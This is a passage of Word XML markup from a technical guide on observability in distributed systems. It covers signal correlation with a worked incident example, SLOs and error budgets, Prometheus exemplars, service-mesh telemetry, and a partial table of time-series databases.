    <w:p w14:paraId="38A55896" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│                                                              │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A444836" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  Saturation            Dependencies         Active Alerts    │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="689311A9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  ┌──────────┐         ┌──────────┐        ┌──────────┐     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D197CA0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">│  │CPU: 45%  │         │ DB: 5ms  │        │ </w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>⚠️</w:t>
      </w:r>
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve"> 1 warn│     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05CEE61D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │Mem: 72%  │         │Redis:0.5ms│        │          │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D5E8DDF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  │Conn: 60% │         │Stripe:80ms│        │          │     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F758BB6" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>│  └──────────┘         └──────────┘        └──────────┘     │</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B7DADF1" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>└──────────────────────────────────────────────────────────────┘</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F86D4CF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="24A6B8C6">
          <v:rect id="_x0000_i6135" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="529EF65E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6. Observability in Distributed Systems — Advanced Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375E66F0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.1 Correlation Across Signals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B9FE984" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>The power of correlating logs, metrics, and traces:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00CE4F1D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05BDBD11" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Alert fires: "Order service error rate &gt; 1%"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B0AEB20" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="4CEB0792" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Step 1 (Metrics): Dashboard shows errors started at 14:25, affecting endpoint POST /orders</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8E3790" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Step 2 (Traces): Filter traces: service=order-service, status=ERROR, time=14:25-14:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DF6931D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  → Find: 80% of error traces have slow span "payment-service.charge" (timeout after 30s)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3776867E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Step 3 (Logs): Filter logs by trace_id of a failing trace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59126A23" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Find: "Connection refused: payment-db-replica-3:5432"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327E9CCE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Step 4 (Metrics): Check payment-db-replica-3 metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E524761" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  → Find: disk 99.8% full since 14:20 → PostgreSQL refused connections</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75892515" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="29609675" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Root cause: payment DB replica disk full → connection failures → payment timeouts → order errors.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7978DBD8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Time to identify: 3 minutes (with observability) vs. 30+ minutes (without).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C96E967" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Correlation keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3484D8AE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="677950E4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>trace_id:  Links logs ↔ traces (log contains trace_id → find the trace)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3421382F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>span_id:   Links specific log entries to specific spans</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7975387D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>service:   Links metrics ↔ logs ↔ traces for a service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21051650" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>pod/host:  Links application signals ↔ infrastructure metrics</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B35BB20" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>timestamp: Rough correlation when no explicit ID exists</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3758A014" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.2 Service Level Objectives (SLOs) and Error Budgets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E01F6DB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C68165D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>SLI (Service Level Indicator):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="102EA95B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  What we measure:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6923CB0B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    Availability SLI: successful requests / total requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D314DAC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    Latency SLI: requests completing within threshold / total requests</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="077D8FD0" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="7702C73F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>SLO (Service Level Objective):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A2ADEE" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  The target:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF7489F" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    "99.9% of requests succeed within 500ms over any 30-day window"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A9C857" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="44777D82" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Error Budget:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3716BE24" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  How much failure is allowed:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E8943B7" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    100% - 99.9% = 0.1% of requests can fail/be slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72F7BF1C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    At 1M requests/day: 1000 "bad" requests allowed per day</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256B8A49" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A4E8C4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Error budget consumption:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36825D4D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  If you've used 50% of budget with 20 days remaining → healthy pace</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4242325B" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  If you've used 90% of budget with 20 days remaining → freeze deploys, fix reliability</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0092AFAB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.3 Exemplars — Connecting Metrics to Traces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1669E819" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77F9CAAA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Problem: Metrics tell you WHAT (p99 latency spiked).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44E0E151" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">         But not WHICH specific request was slow.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0230C4E9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="23FEC203" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Exemplars: Attach a trace_id to a metric data point.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F65BCBD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="7D0692B8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Prometheus histogram with exemplars:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0037AAFD" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds_bucket{le="0.5"} 49500</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A74F0C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  http_request_duration_seconds_bucket{le="1.0"} 49900 # {trace_id="abc123"}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179086D5" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E916AD4" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>In Grafana: click on the p99 spike → see exemplar trace_id → jump directly to the trace.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BBC0B80" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Metrics → one click → Trace → see exactly which request caused the latency spike.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08120818" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>6.4 Service Mesh Observability (Istio/Envoy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36CD24FC" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710AE16" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>Without service mesh:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F37A53" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Each service must be instrumented for metrics, traces, mTLS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78A8B790" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Inconsistent instrumentation across teams/languages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B97015A" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456"/>
    <w:p w14:paraId="6B1BC537" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t>With service mesh (Envoy sidecar):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2369C1FF" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Sidecar proxy automatically captures:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B442695" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    - Request rate, latency, error rate (per-service, per-endpoint)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7088FEE3" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    - Distributed trace headers (propagated automatically)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52A745B9" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    - mTLS certificate info</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="762A9C66" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">    - Retry/timeout/circuit-breaker events</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBEFF39" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49520573" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Zero application code change for basic observability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA7DB26" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:t xml:space="preserve">  Service mesh provides "free" L7 observability for all traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F40DB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:r w:rsidRPr="007A2456">
        <w:pict w14:anchorId="2B0B5275">
          <v:rect id="_x0000_i6136" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7FBA8" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7. Observability Infrastructure — Storage and Querying</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B3E3DAA" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007A2456">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.1 Metrics Storage (Time-Series Databases)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59"/>
        <w:gridCol w:w="3627"/>
        <w:gridCol w:w="3764"/>
      </w:tblGrid>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="2A82812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D0703C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>System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6E8099" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Scale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48160C" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007A2456">
              <w:rPr>
                <w:b/>
                <w:bCs/>
              </w:rPr>
              <w:t>Best For</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="69298F9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A0D239" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Prometheus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ADC73D" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Single-node, 15-30 day retention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C12809" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Kubernetes monitoring</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="4C258B2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75DDFB" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Thanos/Mimir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D1CF63" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Multi-cluster, long-term, HA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0DBD58" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Scaling Prometheus</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="6D0F887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58E549" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>VictoriaMetrics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60F43E" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>High-cardinality, efficient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86B662" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
              <w:t>Drop-in Prometheus replacement</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007A2456" w:rsidRPr="007A2456" w14:paraId="71E56F7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F44123" w14:textId="77777777" w:rsidR="007A2456" w:rsidRPr="007A2456" w:rsidRDefault="007A2456" w:rsidP="007A2456">
            <w:r w:rsidRPr="007A2456">
